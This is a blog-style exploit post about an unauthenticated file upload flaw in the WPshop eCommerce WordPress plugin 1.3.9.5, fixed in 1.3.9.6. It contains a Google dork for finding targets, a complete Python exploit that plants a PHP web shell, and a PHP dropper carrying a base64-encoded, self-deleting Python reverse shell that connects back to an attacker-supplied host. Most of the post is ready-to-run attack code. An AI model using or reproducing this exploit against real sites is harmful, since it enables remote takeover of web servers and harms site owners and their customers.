WordPress WPshop eCommerce 1.3.9.5 Arbitrary File Upload


#-Title: WordPress WPshop eCommerce 1.3.9.5 Shell Upload
#-Author: g0blin
#-Lab : research[dot]g0blin[dot]co[dot]uk
#-Date: 2015-03-02
#-Link Download : wordpress. org/plugins/wpshop/
#-Google Dork: inurl:wp-content/themes/wpshop/
#-Tested on : Linux
#-Fixed in : 1.3.9.6
////////////////////////////////////////////////////////////////////////////////////////////

Information of Bug : 

CVSS Score : 6.4
CSSS Vector : CVSS v2 Vector (AV:N/AC:L/Au:N/C:P/I:P/A:N)
Attack Scope : remote
Authorization Required : None

When Vulnerable : Blank

Description : 
The script ‘includes/ajax.php’ allows execution of various actions by anonymous users. The action name is provided in the ‘elementCode’ parameter. One of these actions is named ‘ajaxUpload’. This function allows for upload of arbitrary files, due to lack of sanitation of user input.


Solution:

Update to version 1.3.9.6.

-- Proof Of Concept --

require : Python (file.py)
How To use :
Python Name-script.py http://web. com back_python (your-ip) 1337
- Example :
Python wpshop.py http://web. com back_python.php 192.168.2.116 1337

Script wpshop.py : 
#!/usr/bin/python2
# coding: utf-8
# Author: Darren Martyn, Xiphos Research Ltd.
# Version: 20150427.1
# Licence: WTFPL - wtfpl.net
import requests
import sys
__version__ = "20150427.1"

def banner():
print """\x1b[1;32m
██╗ ██╗██████╗ ███████╗██╗ ██╗ ██████╗ ██████╗ ██╗ ██╗███╗ ██╗
██║ ██║██╔══██╗██╔════╝██║ ██║██╔═████╗██╔══██╗██║ ██║████╗ ██║
██║ █╗ ██║██████╔╝███████╗███████║██║██╔██║██████╔╝██║ █╗ ██║██╔██╗ ██║
██║███╗██║██╔═══╝ ╚════██║██╔══██║████╔╝██║██╔═══╝ ██║███╗██║██║╚██╗██║
╚███╔███╔╝██║ ███████║██║ ██║╚██████╔╝██║ ╚███╔███╔╝██║ ╚████║
╚══╝╚══╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚══╝╚══╝ ╚═╝ ╚═══╝
Exploit for WPShop Ecommerce, WPVDB-7830 Version: %s\x1b[0m""" %(__version__)

def php_encoder(php):
f = open(php, "r").read()
f = f.replace("<?php", "")
f = f.replace("?>", "")
encoded = f.encode('base64')
encoded = encoded.replace("\n", "")
encoded = encoded.strip()
code = "eval(base64_decode('%s'));" %(encoded)
return code

def shell_upload(url):
target_url = url + "/wp-content/plugins/wpshop/includes/ajax.php?elementCode=ajaxUpload"
try:
print "\x1b[1;32m{+} Using target URL of: %s\x1b[0m" %(target_url)
r = requests.post(url=target_url, files={"wpshop_file":("test.php", "<?php @assert(filter_input(0,woot,516)); ?>")})
except Exception, e:
sys.exit("\x1b[1;31m{-} Exception hit, printing stack trace...\n%s\x1b[0m" %(str(e)))
if r.text:
return r.text.strip()
else:
sys.exit("\x1b[1;31m{-} Something fucked up... Our shell was not uploaded :/\x1b[0m")


def spawn_backconnect(shell_url, payload, cb_host, cb_port):
cookies = {'host': cb_host, 'port': cb_port}
data = {'woot': payload}
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0'}
try:
print "\x1b[1;32m{*} Sending our payload...\x1b[0m"
r = requests.post(url=shell_url, data=data, headers=headers, verify=False, cookies=cookies)
except Exception, e:
sys.exit("\x1b[1;31m{-} Exception hit, printing stack trace...\n%s\x1b[0m" %(str(e)))
if r.text:
print r.text

def pop_shell(target, code, cb_host, cb_port):
shell_url = shell_upload(url=target)
print "\x1b[1;32m{+} Our shell is at: %s\x1b[0m" %(shell_url)
try:
print "\x1b[1;36m{*} Sending Backconnect to %s:%s...\x1b[0m" %(cb_host, cb_port)
spawn_backconnect(shell_url=shell_url, payload=code, cb_host=cb_host, cb_port=cb_port)
except Exception, e:
sys.exit("\x1b[1;31m{-} Exception hit, printing stack trace...\n%s\x1b[0m" %(str(e)))

def main(args):
banner()
if len(args) != 5:
sys.exit("use: %s http://host/wordpress_baseurl/ <payload.php> <cb_host> <cb_port>" %(args[0]))
pop_shell(target=args[1], code=php_encoder(args[2]), cb_host=args[3], cb_port=args[4])

if __name__ == "__main__":
main(args=sys.argv)


Script back_python.php : 

<?php
$cbhost = $_COOKIE['host'];
$cbport = $_COOKIE['port'];
echo "{+} Using ".$cbhost.":".$cbport." as callback...\n{+} Dropping shell...\n";
$shell =
"IyEvdXNyL2Jpbi9weXRob24yCiMgY29kaW5nOiB1dGYtOAojIFNlbGYgRGVzdHJ1Y3RpbmcsIERhZW1vbmluZyBSZXZlcnNlIFBUWS4KIyBybSdzIHNlbGYgb24gcXVpdCA6MwojIFRPRE86CiMgMTogQWRkIGNyeXB0bwojIDI6IEFkZCBwcm9jbmFtZSBzcG9vZgppbXBvcnQgb3MKaW1wb3J0IHN5cwppbXBvcnQgcHR5CmltcG9ydCBzb2NrZXQKaW1wb3J0IGNvbW1hbmRzCgpzaGVsbG1zZyA9ICJceDFiWzBtXHgxYlsxOzM2bUdvdCByb290IHlldD9ceDFiWzBtXHJcbiIgIyBuZWVkeiBhc2NpaQoKZGVmIHF1aXR0ZXIobXNnKToKICAgIHByaW50IG1zZwogICAgb3MudW5saW5rKG9zLnBhdGguYWJzcGF0aChfX2ZpbGVfXykpICMgdW5jb21tZW50IGZvciBnb2dvc2VsZmRlc3RydWN0CiAgICBzeXMuZXhpdCgwKQoKZGVmIHJldmVyc2UoY2Job3N0LCBjYnBvcnQpOgogICAgdHJ5OgogICAgICAgIHVuYW1lID0gY29tbWFuZHMuZ2V0b3V0cHV0KCJ1bmFtZSAtYSIpCiAgICAgICAgaWQgPSBjb21tYW5kcy5nZXRvdXRwdXQoImlkIikKICAgIGV4Y2VwdCBFeGNlcHRpb246CiAgICAgICAgcXVpdHRlcignZ3JhYiB1bmFtZS9pZCBmYWlsJykKICAgIHRyeToKICAgICAgICBzb2NrID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCwgc29ja2V0LlNPQ0tfU1RSRUFNKQogICAgICAgIHNvY2suY29ubmVjdCgoY2Job3N0LCBpbnQoY2Jwb3J0KSkpCiAgICBleGNlcHQ6CiAgICAgICAgcXVpdHRlcignYWJvcnQ6IGNvbm5lY3Rpb24gZmFpbCcpCiAgICB0cnk6CiAgICAgICAgb3MuZHVwMihzb2NrLmZpbGVubygpLCAwKQogICAgICAgIG9zLmR1cDIoc29jay5maWxlbm8oKSwgMSkKICAgICAgICBvcy5kdXAyKHNvY2suZmlsZW5vKCksIDIpCiAgICBleGNlcHQ6CiAgICAgICAgcXVpdHRlcignYWJvcnQ6IGR1cDIgZmFpbCcpCiAgICB0cnk6CiAgICAgICAgb3MucHV0ZW52KCJISVNURklMRSIsICIvZGV2L251bGwiKQogICAgICAgIG9zLnB1dGVudigiUEFUSCIsICcvdXNyL2xvY2FsL3NiaW46L3Vzci9zYmluOi9zYmluOi9iaW46L3Vzci9sb2NhbC9iaW46L3Vzci9iaW4nKQogICAgZXhjZXB0IEV4Y2VwdGlvbjoKICAgICAgICBxdWl0dGVyKCdhYm9ydDogcHV0ZW52IGZhaWwnKQogICAgdHJ5OgogICAgICAgIHNvY2suc2VuZChzaGVsbG1zZykKICAgICAgICBzb2NrLnNlbmQoJ1x4MWJbMTszMm0nK3VuYW1lKyJcclxuIitpZCsiXHgxYlswbVxyXG4iKQogICAgZXhjZXB0IEV4Y2VwdGlvbjoKICAgICAgICBxdWl0dGVyKCdzZW5kIGlkL3VuYW1lIGZ1Y2t1cCcpCiAgICB0cnk6CiAgICAgICAgcHR5LnNwYXduKCcvYmluL2Jhc2gnKQogICAgZXhjZXB0IEV4Y2VwdGlvbjoKICAgICAgICBxdWl0dGVyKCdhYm9ydDogcHR5IHNwYXduIGZhaWwnKQogICAgcXVpdHRlcigncXVpdHRpbmcsIGNsZWFudXAnKQoKZGVmIG1haW4oYXJncyk6CiAgICBpZiBvcy5mb3JrKCkgPiAwOiAKICAgICAgICBvcy5fZXhpdCgwKQogICAgcmV2ZXJzZShzeXMuYXJndlsxXSwgc3lzLmFyZ3ZbMl0pCgppZiBfX25hbWVfXyA9PSAiX19tYWluX18iOgogICAgbWFpbihzeXMuYXJndikK";
$x = fopen("/tmp/x", "w+");
fwrite($x, base64_decode($shell));
fclose($x);
echo "{+} Shell dropped... Triggering...\n";
system("python /tmp/x ".$cbhost." ".$cbport);
die('{+} got shell?'); // payload should have rm'd itself
?>


Result Shell : Here !!

0 Response to "WordPress WPshop eCommerce 1.3.9.5 Arbitrary File Upload"

Posting Komentar